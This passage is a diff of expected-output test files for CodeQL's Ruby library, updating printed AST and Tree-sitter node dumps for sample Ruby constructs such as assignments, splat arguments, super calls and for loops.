# 318| getDesugared: [StmtSequence] ... # 318| getStmt: [AssignExpr] ... = ... -# 318| getAnOperand/getRightOperand: [SelfVariableAccess] self -# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 318| getStmt: [SetterMethodCall] call to count= -# 318| getReceiver: [LocalVariableAccess] __synth__0 -# 318| getArgument: [LocalVariableAccess] __synth__1 +# 318| getAnOperand/getLeftOperand: [MethodCall] call to foo +# 318| getDesugared: [StmtSequence] ... +# 318| getStmt: [SetterMethodCall] call to foo= +# 318| getReceiver: [SelfVariableAccess] self +# 318| getArgument: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 318| getAnOperand/getRightOperand: [MethodCall] call to [] +# 318| getReceiver: [LocalVariableAccess] __synth__0 +# 318| getArgument: [IntegerLiteral] 0 +# 318| getStmt: [LocalVariableAccess] __synth__0__1 # 318| getStmt: [AssignExpr] ... = ... -# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__1 -# 318| getAnOperand/getRightOperand: [AddExpr] ... + ... -# 318| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to count -# 318| getReceiver: [LocalVariableAccess] __synth__0 -# 318| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 -# 318| getStmt: [LocalVariableAccess] __synth__1 -# 319| [AssignAddExpr] ... += ... +# 318| getAnOperand/getLeftOperand: [MethodCall] call to bar +# 318| getDesugared: [StmtSequence] ... +# 318| getStmt: [SetterMethodCall] call to bar= +# 318| getReceiver: [SelfVariableAccess] self +# 318| getArgument: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 318| getAnOperand/getRightOperand: [MethodCall] call to [] +# 318| getReceiver: [LocalVariableAccess] __synth__0 +# 318| getArgument: [RangeLiteral] _ .. _ +# 318| getBegin: [IntegerLiteral] 1 +# 318| getEnd: [IntegerLiteral] -2 +# 318| getStmt: [LocalVariableAccess] __synth__0__1 +# 318| getStmt: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [ElementReference] ...[...] +# 318| getDesugared: [StmtSequence] ... +# 318| getStmt: [SetterMethodCall] call to []= +# 318| getReceiver: [MethodCall] call to foo +# 318| getReceiver: [SelfVariableAccess] self +# 318| getArgument: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 318| getAnOperand/getRightOperand: [MethodCall] call to [] +# 318| getReceiver: [LocalVariableAccess] __synth__0 +# 318| getArgument: [IntegerLiteral] -1 +# 318| getArgument: [IntegerLiteral] 4 +# 318| getStmt: [LocalVariableAccess] __synth__0__1 +# 318| getStmt: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 +# 318| getAnOperand/getRightOperand: [SplatExpr] * ... +# 318| getAnOperand/getOperand/getReceiver: [ArrayLiteral] [...] +# 318| getDesugared: [MethodCall] call to [] +# 318| getReceiver: [ConstantReadAccess] Array +# 318| getArgument: [IntegerLiteral] 1 +# 318| getArgument: [IntegerLiteral] 2 +# 318| getArgument: [IntegerLiteral] 3 +# 318| getArgument: [IntegerLiteral] 4 +# 319| [AssignExpr] ... = ... # 319| getDesugared: [StmtSequence] ... # 319| getStmt: [AssignExpr] ... = ... -# 319| getAnOperand/getRightOperand: [MethodCall] call to foo -# 319| getReceiver: [SelfVariableAccess] self +# 319| getAnOperand/getLeftOperand: [LocalVariableAccess] a +# 319| getAnOperand/getRightOperand: [MethodCall] call to [] +# 319| getReceiver: [LocalVariableAccess] __synth__0 +# 319| getArgument: [IntegerLiteral] 0 +# 319| getStmt: [AssignExpr] ... = ... +# 319| getAnOperand/getLeftOperand: [ElementReference] ...[...] +# 319| getDesugared: [StmtSequence] ... +# 319| getStmt: [SetterMethodCall] call to []= +# 319| getReceiver: [MethodCall] call to foo +# 319| getReceiver: [SelfVariableAccess] self +# 319| getArgument: [AssignExpr] ... = ... +# 319| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 319| getAnOperand/getRightOperand: [MethodCall] call to [] +# 319| getReceiver: [LocalVariableAccess] __synth__0 +# 319| getArgument: [RangeLiteral] _ .. _ +# 319| getBegin: [IntegerLiteral] 1 +# 319| getEnd: [IntegerLiteral] -1 +# 319| getArgument: [IntegerLiteral] 5 +# 319| getStmt: [LocalVariableAccess] __synth__0__1 +# 319| getStmt: [AssignExpr] ... = ... # 319| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 319| getStmt: [SetterMethodCall] call to []= -# 319| getReceiver: [LocalVariableAccess] __synth__0 -# 319| getArgument: [LocalVariableAccess] __synth__1 -# 319| getArgument: [LocalVariableAccess] __synth__2 -# 319| getStmt: [AssignExpr] ... = ... -# 319| getAnOperand/getRightOperand: [IntegerLiteral] 0 -# 319| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__1 -# 319| getStmt: [AssignExpr] ... = ... -# 319| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__2 -# 319| getAnOperand/getRightOperand: [AddExpr] ... + ... -# 319| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to [] -# 319| getReceiver: [LocalVariableAccess] __synth__0 -# 319| getArgument: [LocalVariableAccess] __synth__1 -# 319| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 -# 319| getStmt: [LocalVariableAccess] __synth__2 -# 320| [AssignMulExpr] ... *= ... +# 319| getAnOperand/getRightOperand: [SplatExpr] * ... +# 319| getAnOperand/getOperand/getReceiver: [ArrayLiteral] [...] +# 319| getDesugared: [MethodCall] call to [] +# 319| getReceiver: [ConstantReadAccess] Array +# 319| getArgument: [IntegerLiteral] 1 +# 319| getArgument: [IntegerLiteral] 2 +# 319| getArgument: [IntegerLiteral] 3 +# 320| [AssignAddExpr] ... += ... # 320| getDesugared: [StmtSequence] ... # 320| getStmt: [AssignExpr] ... = ... -# 320| getAnOperand/getRightOperand: [MethodCall] call to bar -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self +# 320| getAnOperand/getRightOperand: [SelfVariableAccess] self # 320| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 320| getStmt: [SetterMethodCall] call to []= +# 320| getStmt: [SetterMethodCall] call to count= # 320| getReceiver: [LocalVariableAccess] __synth__0 # 320| getArgument: [LocalVariableAccess] __synth__1 -# 320| getArgument: [LocalVariableAccess] __synth__2 -# 320| getArgument: [LocalVariableAccess] __synth__3 -# 320| getArgument: [LocalVariableAccess] __synth__4 # 320| getStmt: [AssignExpr] ... = ... -# 320| getAnOperand/getRightOperand: [IntegerLiteral] 0 # 320| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__1 -# 320| getStmt: [AssignExpr] ... = ... -# 320| getAnOperand/getRightOperand: [MethodCall] call to baz -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self -# 320| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__2 -# 320| getStmt: [AssignExpr] ... = ... # 320| getAnOperand/getRightOperand: [AddExpr] ... + ... -# 320| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to boo -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self -# 320| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 -# 320| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__3 -# 320| getStmt: [AssignExpr] ... = ... -# 320| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__4 -# 320| getAnOperand/getRightOperand: [MulExpr] ... * ... -# 320| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to [] +# 320| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to count # 320| getReceiver: [LocalVariableAccess] __synth__0 -# 320| getArgument: [LocalVariableAccess] __synth__1 -# 320| getArgument: [LocalVariableAccess] __synth__2 -# 320| getArgument: [LocalVariableAccess] __synth__3 -# 320| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 2 -# 320| getStmt: [LocalVariableAccess] __synth__4 -# 340| [ForExpr] for ... in ... -# 340| getDesugared: [MethodCall] call to each -# 340| getBlock: [BraceBlock] { ... } -# 340| getParameter: [SimpleParameter] __synth__0__1 -# 340| getDefiningAccess: [LocalVariableAccess] __synth__0__1 -# 340| getStmt: [AssignExpr] ... = ... -# 340| getDesugared: [StmtSequence] ... -# 340| getStmt: [AssignExpr] ... = ... -# 340| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 340| getAnOperand/getRightOperand: [SplatExpr] * ... -# 340| getAnOperand/getOperand/getReceiver: [LocalVariableAccess] __synth__0__1 -# 340| getStmt: [AssignExpr] ... = ... -# 340| getAnOperand/getLeftOperand: [LocalVariableAccess] x -# 340| getAnOperand/getRightOperand: [MethodCall] call to [] -# 340| getReceiver: [LocalVariableAccess] __synth__0__1 -# 340| getArgument: [IntegerLiteral] 0 -# 340| getStmt: [AssignExpr] ... = ... -# 340| getAnOperand/getLeftOperand: [LocalVariableAccess] y -# 340| getAnOperand/getRightOperand: [MethodCall] call to [] -# 340| getReceiver: [LocalVariableAccess] __synth__0__1 -# 340| getArgument: [IntegerLiteral] 1 -# 340| getStmt: [AssignExpr] ... = ... -# 340| getAnOperand/getLeftOperand: [LocalVariableAccess] z -# 340| getAnOperand/getRightOperand: [MethodCall] call to [] -# 340| getReceiver: [LocalVariableAccess] __synth__0__1 -# 340| getArgument: [IntegerLiteral] 2 -# 340| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) -# 341| getStmt: [MethodCall] call to foo -# 341| getReceiver: [SelfVariableAccess] self -# 341| getArgument: [LocalVariableAccess] x -# 341| getArgument: [LocalVariableAccess] y -# 341| getArgument: [LocalVariableAccess] z -# 340| getReceiver: [ArrayLiteral] [...] -# 340| getDesugared: [MethodCall] call to [] -# 340| getReceiver: [ConstantReadAccess] Array -# 340| getArgument: [ArrayLiteral] [...] -# 340| getDesugared: [MethodCall] call to [] -# 340| getReceiver: [ConstantReadAccess] Array -# 340| getArgument: [IntegerLiteral] 1 -# 340| getArgument: [IntegerLiteral] 2 -# 340| getArgument: [IntegerLiteral] 3 -# 340| getArgument: [ArrayLiteral] [...] -# 340| getDesugared: [MethodCall] call to [] -# 340| getReceiver: [ConstantReadAccess] Array -# 340| getArgument: [IntegerLiteral] 4 -# 340| getArgument: [IntegerLiteral] 5 -# 340| getArgument: [IntegerLiteral] 6 -# 362| [MethodCall] call to empty? -# 362| getDesugared: [StmtSequence] ... -# 362| getStmt: [AssignExpr] ... = ... -# 362| getAnOperand/getRightOperand: [MethodCall] call to list -# 362| getReceiver: [SelfVariableAccess] self -# 362| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 362| getStmt: [IfExpr] if ... -# 362| getBranch/getThen: [NilLiteral] nil -# 362| getBranch/getElse: [MethodCall] call to empty? -# 362| getReceiver: [LocalVariableAccess] __synth__0__1 -# 362| getCondition: [MethodCall] call to == -# 362| getArgument: [LocalVariableAccess] __synth__0__1 -# 362| getReceiver: [NilLiteral] nil -# 364| [MethodCall] call to bar +# 320| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 +# 320| getStmt: [LocalVariableAccess] __synth__1 +# 321| [AssignAddExpr] ... += ... +# 321| getDesugared: [StmtSequence] ... +# 321| getStmt: [AssignExpr] ... = ... +# 321| getAnOperand/getRightOperand: [MethodCall] call to foo +# 321| getReceiver: [SelfVariableAccess] self +# 321| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 +# 321| getStmt: [SetterMethodCall] call to []= +# 321| getReceiver: [LocalVariableAccess] __synth__0 +# 321| getArgument: [LocalVariableAccess] __synth__1 +# 321| getArgument: [LocalVariableAccess] __synth__2 +# 321| getStmt: [AssignExpr] ... = ... +# 321| getAnOperand/getRightOperand: [IntegerLiteral] 0 +# 321| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__1 +# 321| getStmt: [AssignExpr] ... = ... +# 321| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__2 +# 321| getAnOperand/getRightOperand: [AddExpr] ... + ... +# 321| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to [] +# 321| getReceiver: [LocalVariableAccess] __synth__0 +# 321| getArgument: [LocalVariableAccess] __synth__1 +# 321| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 +# 321| getStmt: [LocalVariableAccess] __synth__2 +# 322| [AssignMulExpr] ... *= ... +# 322| getDesugared: [StmtSequence] ... +# 322| getStmt: [AssignExpr] ... = ... +# 322| getAnOperand/getRightOperand: [MethodCall] call to bar +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 +# 322| getStmt: [SetterMethodCall] call to []= +# 322| getReceiver: [LocalVariableAccess] __synth__0 +# 322| getArgument: [LocalVariableAccess] __synth__1 +# 322| getArgument: [LocalVariableAccess] __synth__2 +# 322| getArgument: [LocalVariableAccess] __synth__3 +# 322| getArgument: [LocalVariableAccess] __synth__4 +# 322| getStmt: [AssignExpr] ... = ... +# 322| getAnOperand/getRightOperand: [IntegerLiteral] 0 +# 322| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__1 +# 322| getStmt: [AssignExpr] ... = ... +# 322| getAnOperand/getRightOperand: [MethodCall] call to baz +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__2 +# 322| getStmt: [AssignExpr] ... = ... +# 322| getAnOperand/getRightOperand: [AddExpr] ... + ... +# 322| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to boo +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 +# 322| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__3 +# 322| getStmt: [AssignExpr] ... = ... +# 322| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__4 +# 322| getAnOperand/getRightOperand: [MulExpr] ... * ... +# 322| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to [] +# 322| getReceiver: [LocalVariableAccess] __synth__0 +# 322| getArgument: [LocalVariableAccess] __synth__1 +# 322| getArgument: [LocalVariableAccess] __synth__2 +# 322| getArgument: [LocalVariableAccess] __synth__3 +# 322| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 2 +# 322| getStmt: [LocalVariableAccess] __synth__4 +# 342| [ForExpr] for ... in ... +# 342| getDesugared: [MethodCall] call to each +# 342| getBlock: [BraceBlock] { ... } +# 342| getParameter: [SimpleParameter] __synth__0__1 +# 342| getDefiningAccess: [LocalVariableAccess] __synth__0__1 +# 342| getStmt: [AssignExpr] ... = ... +# 342| getDesugared: [StmtSequence] ... +# 342| getStmt: [AssignExpr] ... = ... +# 342| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 342| getAnOperand/getRightOperand: [SplatExpr] * ... +# 342| getAnOperand/getOperand/getReceiver: [LocalVariableAccess] __synth__0__1 +# 342| getStmt: [AssignExpr] ... = ... +# 342| getAnOperand/getLeftOperand: [LocalVariableAccess] x +# 342| getAnOperand/getRightOperand: [MethodCall] call to [] +# 342| getReceiver: [LocalVariableAccess] __synth__0__1 +# 342| getArgument: [IntegerLiteral] 0 +# 342| getStmt: [AssignExpr] ... = ... +# 342| getAnOperand/getLeftOperand: [LocalVariableAccess] y +# 342| getAnOperand/getRightOperand: [MethodCall] call to [] +# 342| getReceiver: [LocalVariableAccess] __synth__0__1 +# 342| getArgument: [IntegerLiteral] 1 +# 342| getStmt: [AssignExpr] ... = ... +# 342| getAnOperand/getLeftOperand: [LocalVariableAccess] z +# 342| getAnOperand/getRightOperand: [MethodCall] call to [] +# 342| getReceiver: [LocalVariableAccess] __synth__0__1 +# 342| getArgument: [IntegerLiteral] 2 +# 342| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) +# 343| getStmt: [MethodCall] call to foo +# 343| getReceiver: [SelfVariableAccess] self +# 343| getArgument: [LocalVariableAccess] x +# 343| getArgument: [LocalVariableAccess] y +# 343| getArgument: [LocalVariableAccess] z +# 342| getReceiver: [ArrayLiteral] [...] +# 342| getDesugared: [MethodCall] call to [] +# 342| getReceiver: [ConstantReadAccess] Array +# 342| getArgument: [ArrayLiteral] [...] +# 342| getDesugared: [MethodCall] call to [] +# 342| getReceiver: [ConstantReadAccess] Array +# 342| getArgument: [IntegerLiteral] 1 +# 342| getArgument: [IntegerLiteral] 2 +# 342| getArgument: [IntegerLiteral] 3 +# 342| getArgument: [ArrayLiteral] [...] +# 342| getDesugared: [MethodCall] call to [] +# 342| getReceiver: [ConstantReadAccess] Array +# 342| getArgument: [IntegerLiteral] 4 +# 342| getArgument: [IntegerLiteral] 5 +# 342| getArgument: [IntegerLiteral] 6 +# 364| [MethodCall] call to empty? # 364| getDesugared: [StmtSequence] ... # 364| getStmt: [AssignExpr] ... = ... -# 364| getAnOperand/getRightOperand: [MethodCall] call to foo +# 364| getAnOperand/getRightOperand: [MethodCall] call to list # 364| getReceiver: [SelfVariableAccess] self # 364| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 # 364| getStmt: [IfExpr] if ... # 364| getBranch/getThen: [NilLiteral] nil -# 364| getBranch/getElse: [MethodCall] call to bar +# 364| getBranch/getElse: [MethodCall] call to empty? # 364| getReceiver: [LocalVariableAccess] __synth__0__1 -# 364| getArgument: [IntegerLiteral] 1 -# 364| getArgument: [IntegerLiteral] 2 -# 364| getBlock: [BraceBlock] { ... } -# 364| getParameter: [SimpleParameter] x -# 364| getDefiningAccess: [LocalVariableAccess] x -# 364| getStmt: [LocalVariableAccess] x # 364| getCondition: [MethodCall] call to == # 364| getArgument: [LocalVariableAccess] __synth__0__1 # 364| getReceiver: [NilLiteral] nil +# 366| [MethodCall] call to bar +# 366| getDesugared: [StmtSequence] ... +# 366| getStmt: [AssignExpr] ... = ... +# 366| getAnOperand/getRightOperand: [MethodCall] call to foo +# 366| getReceiver: [SelfVariableAccess] self +# 366| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 +# 366| getStmt: [IfExpr] if ... +# 366| getBranch/getThen: [NilLiteral] nil +# 366| getBranch/getElse: [MethodCall] call to bar +# 366| getReceiver: [LocalVariableAccess] __synth__0__1 +# 366| getArgument: [IntegerLiteral] 1 +# 366| getArgument: [IntegerLiteral] 2 +# 366| getBlock: [BraceBlock] { ... } +# 366| getParameter: [SimpleParameter] x +# 366| getDefiningAccess: [LocalVariableAccess] x +# 366| getStmt: [LocalVariableAccess] x +# 366| getCondition: [MethodCall] call to == +# 366| getArgument: [LocalVariableAccess] __synth__0__1 +# 366| getReceiver: [NilLiteral] nil control/cases.rb: # 90| [ArrayLiteral] %w(...) # 90| getDesugared: [MethodCall] call to [] diff --git a/ruby/ql/test/library-tests/ast/TreeSitter.expected b/ruby/ql/test/library-tests/ast/TreeSitter.expected index a0e32ce0aa4..1a73acff160 100644 --- a/ruby/ql/test/library-tests/ast/TreeSitter.expected +++ b/ruby/ql/test/library-tests/ast/TreeSitter.expected @@ -779,110 +779,92 @@ calls/calls.rb: # 271| 1: [ReservedWord] :: # 271| 2: [Identifier] bar # 271| 2: [ReservedWord] ) -# 274| 84: [Call] Call -# 274| 0: [Identifier] foo -# 274| 1: [ArgumentList] ArgumentList -# 274| 0: [ReservedWord] ( -# 274| 1: [HashSplatArgument] HashSplatArgument -# 274| 0: [ReservedWord] ** -# 274| 1: [Identifier] bar -# 274| 2: [ReservedWord] ) +# 272| 84: [Call] Call +# 272| 0: [Identifier] foo +# 272| 1: [ArgumentList] ArgumentList +# 272| 0: [ReservedWord] ( +# 272| 1: [SplatArgument] SplatArgument +# 272| 0: [ReservedWord] * +# 272| 2: [ReservedWord] ) # 275| 85: [Call] Call # 275| 0: [Identifier] foo # 275| 1: [ArgumentList] ArgumentList # 275| 0: [ReservedWord] ( # 275| 1: [HashSplatArgument] HashSplatArgument # 275| 0: [ReservedWord] ** -# 275| 1: [Call] Call -# 275| 0: [Constant] X -# 275| 1: [ReservedWord] :: -# 275| 2: [Identifier] bar +# 275| 1: [Identifier] bar # 275| 2: [ReservedWord] ) -# 278| 86: [Call] Call -# 278| 0: [Identifier] foo -# 278| 1: [ArgumentList] ArgumentList -# 278| 0: [ReservedWord] ( -# 278| 1: [Pair] Pair -# 278| 0: [HashKeySymbol] blah -# 278| 1: [ReservedWord] : -# 278| 2: [Identifier] bar -# 278| 2: [ReservedWord] ) -# 279| 87: [Call] Call -# 279| 0: [Identifier] foo -# 279| 1: [ArgumentList] ArgumentList -# 279| 0: [ReservedWord] ( -# 279| 1: [Pair] Pair -# 279| 0: [HashKeySymbol] blah -# 279| 1: [ReservedWord] : -# 279| 2: [Call] Call -# 279| 0: [Constant] X -# 279| 1: [ReservedWord] :: -# 279| 2: [Identifier] bar -# 279| 2: [ReservedWord] ) -# 284| 88: [Class] Class -# 284| 0: [ReservedWord] class -# 284| 1: [Constant] MyClass -# 285| 2: [BodyStatement] BodyStatement -# 285| 0: [Method] Method -# 285| 0: [ReservedWord] def -# 285| 1: [Identifier] my_method -# 286| 2: [BodyStatement] BodyStatement -# 286| 0: [Super] super -# 287| 1: [Call] Call -# 287| 0: [Super] super -# 287| 1: [ArgumentList] ArgumentList -# 287| 0: [ReservedWord] ( -# 287| 1: [ReservedWord] ) -# 288| 2: [Call] Call -# 288| 0: [Super] super -# 288| 1: [ArgumentList] ArgumentList -# 288| 0: [String] String -# 288| 0: [ReservedWord] ' -# 288| 1: [StringContent] blah -# 288| 2: [ReservedWord] ' -# 289| 3: [Call] Call +# 276| 86: [Call] Call +# 276| 0: [Identifier] foo +# 276| 1: [ArgumentList] ArgumentList +# 276| 0: [ReservedWord] ( +# 276| 1: [HashSplatArgument] HashSplatArgument +# 276| 0: [ReservedWord] ** +# 276| 1: [Call] Call +# 276| 0: [Constant] X +# 276| 1: [ReservedWord] :: +# 276| 2: [Identifier] bar +# 276| 2: [ReservedWord] ) +# 277| 87: [Call] Call +# 277| 0: [Identifier] foo +# 277| 1: [ArgumentList] ArgumentList +# 277| 0: [ReservedWord] ( +# 277| 1: [HashSplatArgument] HashSplatArgument +# 277| 0: [ReservedWord] ** +# 277| 2: [ReservedWord] ) +# 280| 88: [Call] Call +# 280| 0: [Identifier] foo +# 280| 1: [ArgumentList] ArgumentList +# 280| 0: [ReservedWord] ( +# 280| 1: [Pair] Pair +# 280| 0: [HashKeySymbol] blah +# 280| 1: [ReservedWord] : +# 280| 2: [Identifier] bar +# 280| 2: [ReservedWord] ) +# 281| 89: [Call] Call +# 281| 0: [Identifier] foo +# 281| 1: [ArgumentList] ArgumentList +# 281| 0: [ReservedWord] ( +# 281| 1: [Pair] Pair +# 281| 0: [HashKeySymbol] blah +# 281| 1: [ReservedWord] : +# 281| 2: [Call] Call +# 281| 0: [Constant] X +# 281| 1: [ReservedWord] :: +# 281| 2: [Identifier] bar +# 281| 2: [ReservedWord] ) +# 286| 90: [Class] Class +# 286| 0: [ReservedWord] class +# 286| 1: [Constant] MyClass +# 287| 2: [BodyStatement] BodyStatement +# 287| 0: [Method] Method +# 287| 0: [ReservedWord] def +# 287| 1: [Identifier] my_method +# 288| 2: [BodyStatement] BodyStatement +# 288| 0: [Super] super +# 289| 1: [Call] Call # 289| 0: [Super] super # 289| 1: [ArgumentList] ArgumentList -# 289| 0: [Integer] 1 -# 289| 1: [ReservedWord] , -# 289| 2: [Integer] 2 -# 289| 3: [ReservedWord] , -# 289| 4: [Integer] 3 -# 290| 4: [Call] Call +# 289| 0: [ReservedWord] ( +# 289| 1: [ReservedWord] ) +# 290| 2: [Call] Call # 290| 0: [Super] super -# 290| 1: [Block] Block -# 290| 0: [ReservedWord] { -# 290| 1: [BlockParameters] BlockParameters -# 290| 0: [ReservedWord] | -# 290| 1: [Identifier] x -# 290| 2: [ReservedWord] | -# 290| 2: [BlockBody] BlockBody -# 290| 0: [Binary] Binary -# 290| 0: [Identifier] x -# 290| 1: [ReservedWord] + -# 290| 2: [Integer] 1 -# 290| 3: [ReservedWord] } -# 291| 5: [Call] Call +# 290| 1: [ArgumentList] ArgumentList +# 290| 0: [String] String +# 290| 0: [ReservedWord] ' +# 290| 1: [StringContent] blah +# 290| 2: [ReservedWord] ' +# 291| 3: [Call] Call # 291| 0: [Super] super -# 291| 1: [DoBlock] DoBlock -# 291| 0: [ReservedWord] do -# 291| 1: [BlockParameters] BlockParameters -# 291| 0: [ReservedWord] | -# 291| 1: [Identifier] x -# 291| 2: [ReservedWord] | -# 291| 2: [BodyStatement] BodyStatement -# 291| 0: [Binary] Binary -# 291| 0: [Identifier] x -# 291| 1: [ReservedWord] * -# 291| 2: [Integer] 2 -# 291| 3: [ReservedWord] end -# 292| 6: [Call] Call +# 291| 1: [ArgumentList] ArgumentList +# 291| 0: [Integer] 1 +# 291| 1: [ReservedWord] , +# 291| 2: [Integer] 2 +# 291| 3: [ReservedWord] , +# 291| 4: [Integer] 3 +# 292| 4: [Call] Call # 292| 0: [Super] super -# 292| 1: [ArgumentList] ArgumentList -# 292| 0: [Integer] 4 -# 292| 1: [ReservedWord] , -# 292| 2: [Integer] 5 -# 292| 2: [Block] Block +# 292| 1: [Block] Block # 292| 0: [ReservedWord] { # 292| 1: [BlockParameters] BlockParameters # 292| 0: [ReservedWord] | @@ -892,15 +874,11 @@ calls/calls.rb: # 292| 0: [Binary] Binary # 292| 0: [Identifier] x # 292| 1: [ReservedWord] + -# 292| 2: [Integer] 100 +# 292| 2: [Integer] 1 # 292| 3: [ReservedWord] } -# 293| 7: [Call] Call +# 293| 5: [Call] Call # 293| 0: [Super] super -# 293| 1: [ArgumentList] ArgumentList -# 293| 0: [Integer] 6 -# 293| 1: [ReservedWord] , -# 293| 2: [Integer] 7 -# 293| 2: [DoBlock] DoBlock +# 293| 1: [DoBlock] DoBlock # 293| 0: [ReservedWord] do # 293| 1: [BlockParameters] BlockParameters # 293| 0: [ReservedWord] | @@ -909,317 +887,332 @@ calls/calls.rb: # 293| 2: [BodyStatement] BodyStatement # 293| 0: [Binary] Binary # 293| 0: [Identifier] x -# 293| 1: [ReservedWord] + -# 293| 2: [Integer] 200 +# 293| 1: [ReservedWord] * +# 293| 2: [Integer] 2 # 293| 3: [ReservedWord] end -# 294| 3: [ReservedWord] end -# 295| 3: [ReservedWord] end -# 301| 89: [Class] Class -# 301| 0: [ReservedWord] class -# 301| 1: [Constant] AnotherClass -# 302| 2: [BodyStatement] BodyStatement -# 302| 0: [Method] Method -# 302| 0: [ReservedWord] def -# 302| 1: [Identifier] another_method -# 303| 2: [BodyStatement] BodyStatement -# 303| 0: [Call] Call -# 303| 0: [Identifier] foo -# 303| 1: [ReservedWord] . -# 303| 2: [Identifier] super -# 304| 1: [Call] Call -# 304| 0: [Self] self -# 304| 1: [ReservedWord] . -# 304| 2: [Identifier] super -# 305| 2: [Call] Call -# 305| 0: [Super] super +# 294| 6: [Call] Call +# 294| 0: [Super] super +# 294| 1: [ArgumentList] ArgumentList +# 294| 0: [Integer] 4 +# 294| 1: [ReservedWord] , +# 294| 2: [Integer] 5 +# 294| 2: [Block] Block +# 294| 0: [ReservedWord] { +# 294| 1: [BlockParameters] BlockParameters +# 294| 0: [ReservedWord] | +# 294| 1: [Identifier] x +# 294| 2: [ReservedWord] | +# 294| 2: [BlockBody] BlockBody +# 294| 0: [Binary] Binary +# 294| 0: [Identifier] x +# 294| 1: [ReservedWord] + +# 294| 2: [Integer] 100 +# 294| 3: [ReservedWord] } +# 295| 7: [Call] Call +# 295| 0: [Super] super +# 295| 1: [ArgumentList] ArgumentList +# 295| 0: [Integer] 6 +# 295| 1: [ReservedWord] , +# 295| 2: [Integer] 7 +# 295| 2: [DoBlock] DoBlock +# 295| 0: [ReservedWord] do +# 295| 1: [BlockParameters] BlockParameters +# 295| 0: [ReservedWord] | +# 295| 1: [Identifier] x +# 295| 2: [ReservedWord] | +# 295| 2: [BodyStatement] BodyStatement +# 295| 0: [Binary] Binary +# 295| 0: [Identifier] x +# 295| 1: [ReservedWord] + +# 295| 2: [Integer] 200 +# 295| 3: [ReservedWord] end +# 296| 3: [ReservedWord] end +# 297| 3: [ReservedWord] end +# 303| 91: [Class] Class +# 303| 0: [ReservedWord] class +# 303| 1: [Constant] AnotherClass +# 304| 2: [BodyStatement] BodyStatement +# 304| 0: [Method] Method +# 304| 0: [ReservedWord] def +# 304| 1: [Identifier] another_method +# 305| 2: [BodyStatement] BodyStatement +# 305| 0: [Call] Call +# 305| 0: [Identifier] foo # 305| 1: [ReservedWord] . # 305| 2: [Identifier] super -# 306| 3: [ReservedWord] end -# 307| 3: [ReservedWord] end -# 310| 90: [Call] Call -# 310| 0: [Identifier] foo -# 310| 1: [ReservedWord] . -# 310| 2: [ArgumentList] ArgumentList -# 310| 0: [ReservedWord] ( -# 310| 1: [ReservedWord] ) -# 311| 91: [Call] Call -# 311| 0: [Identifier] foo -# 311| 1: [ReservedWord] . -# 311| 2: [ArgumentList] ArgumentList -# 311| 0: [ReservedWord] ( -# 311| 1: [Integer] 1 -# 311| 2: [ReservedWord] ) -# 314| 92: [Assignment] Assignment -# 314| 0: [Call] Call -# 314| 0: [Self] self -# 314| 1: [ReservedWord] . -# 314| 2: [Identifier] foo -# 314| 1: [ReservedWord] = -# 314| 2: [Integer] 10 -# 315| 93: [Assignment] Assignment -# 315| 0: [ElementReference] ElementReference -# 315| 0: [Identifier] foo -# 315| 1: [ReservedWord] [ -# 315| 2: 